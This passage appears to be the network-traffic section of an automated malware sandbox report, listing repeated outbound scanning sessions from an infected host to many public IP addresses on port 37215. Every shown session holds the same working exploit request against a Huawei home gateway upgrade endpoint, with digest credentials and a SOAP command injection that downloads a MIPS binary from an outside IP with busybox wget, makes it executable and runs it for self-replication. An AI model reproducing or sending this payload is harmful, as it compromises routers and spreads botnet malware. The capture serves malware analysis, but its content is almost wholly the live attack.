                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  240192.168.2.1345080197.54.26.9937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.078202009 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  241192.168.2.1334172197.114.81.15337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.078227997 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  242192.168.2.1341560157.126.68.6937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.078227997 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  243192.168.2.133773641.85.174.13637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.078229904 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  244192.168.2.133288441.109.75.23637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.078676939 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  245192.168.2.135030636.11.106.12637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.078723907 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  246192.168.2.135803841.215.245.24837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.078731060 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  247192.168.2.133334094.66.98.1437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.078731060 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  248192.168.2.135804841.93.12.9437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.078742027 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  249192.168.2.1359128157.220.254.17137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.078767061 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 